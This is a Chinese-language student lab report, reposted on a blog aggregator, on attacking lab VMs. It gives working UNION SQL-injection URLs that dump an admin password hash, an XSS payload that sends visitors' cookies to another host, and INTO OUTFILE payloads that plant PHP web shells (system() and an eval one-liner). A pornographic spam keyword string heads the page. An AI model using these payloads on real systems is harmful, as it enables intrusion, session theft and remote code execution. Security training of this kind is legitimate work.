日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

实验报告 五

發布時間:2024/5/8 编程问答 33 豆豆
生活随笔 收集整理的這篇文章主要介紹了 实验报告 五 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

1.sql注入

首先搭建虛擬機 用kali掃描下當前網段 發現一個192.168.138.134的可疑ip地址

打開該虛擬機提供的網頁 使用發現可能存在sql注入點

http://192.168.138.134/cat.php?id=1

http://192.168.138.134/cat.php?id=1'

?

?

使用order by語句試出網站后臺數據庫表的列數 當order by 5 時網頁報錯 因此該查詢涉及到四列元素

?

?

?

?

使用聯合查詢 查看網頁的顯示位

?

?發現2是回顯位,發現數據庫的名字為photoblog

?

http://192.168.138.134/cat.php?id=-2%20union%20select%201,group_concat(table_name),3,4%20from%20information_schema.tables%20where%20table_schema=%27photoblog%27

順勢查到數據庫中的表,可見users表對我們有用

http://192.168.138.134/cat.php?id=-2%20union%20select%201,group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_name=%27users%27

繼續查詢users表中列名,有變量名 id,login,password

?查看users表中的數據:id=1 login=admin password=8efe310f9ab3efeae8d410a8e0166eb2

http://192.168.138.134/cat.php?id=-1%20union%20select%201,group_concat(id,0x23,login,0x23,password),3,4%20from%20users

?

?

?

jiemi

MD5解密后,得到密碼P4ssw0rd

?

登錄到管理員頁面

嘗試上傳文件,發現nophp

改完后綴名發現,可以繞過,并上傳成功

?

?得到目錄,用菜刀連一下

?

?

?

2.xss靶機攻擊

nmap 掃描一下發現靶機開著80端口和ssh協議

發現有彈窗回顯,存在xss漏洞

在靶機上留言<script>document.write('<img src="http://192.168.138.139/?'+document.cookie+' "/>')</script>

可以將任意登錄用戶的cookie發送到指定ip 在指定 ip 接受 cookie 后可以偽造成登陸者

在原來機器上登錄admin賬戶,密碼P4ssw0rd

刷新下頁面,發現已經已admin的身份登錄進頁面中。

進入管理界面后,發現博客編輯界面存在sql注入漏洞。

?

http://192.168.138.135/admin/edit.php?id=4 union select 1,2,3,4

發現2和3可以顯示出來。

?

http://192.168.138.135/admin/edit.php?id=0 union select 1,2,load_file("/etc/passwd"),4

可以讀取passwd文件,但是不能讀取shadow文件。我們嘗試能不能創建一個文件。

在編輯頁面發現錯誤提示中有/var/www/classes 目錄,

?

嘗試后發現/var/www/css 目錄可寫。

于是構造語句:

http://192.168.138.135/admin/edit.php?id=2%20union%20select%201,2,3,4%20into%20outfile%20%22/var/www/css/s.php%22

然后打開

http://192.168.138.135/css/s.php

說明s.php文件成功寫入到/var/www/css 目錄,下面將

<?php system($_GET['c']); ?>

寫入z.php中,構造url為:

http://192.168.138.135/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20system($_GET[%27c%27]);%20?%3E%22,4%20into%20outfile%20%22/var/www/css/z.php%22

訪問z.php,并使用uname -a獲取系統信息。可以遠程執行命令。

下面寫入一句話木馬,構造url:

http://192.168.138.135/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20@eval($_POST[%27chopper%27]);?%3E%22,4%20into%20outfile%20%22/var/www/css/dao.php%22

?

轉載于:https://www.cnblogs.com/P201521410043/p/8906642.html

總結

以上是生活随笔為你收集整理的实验报告 五的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。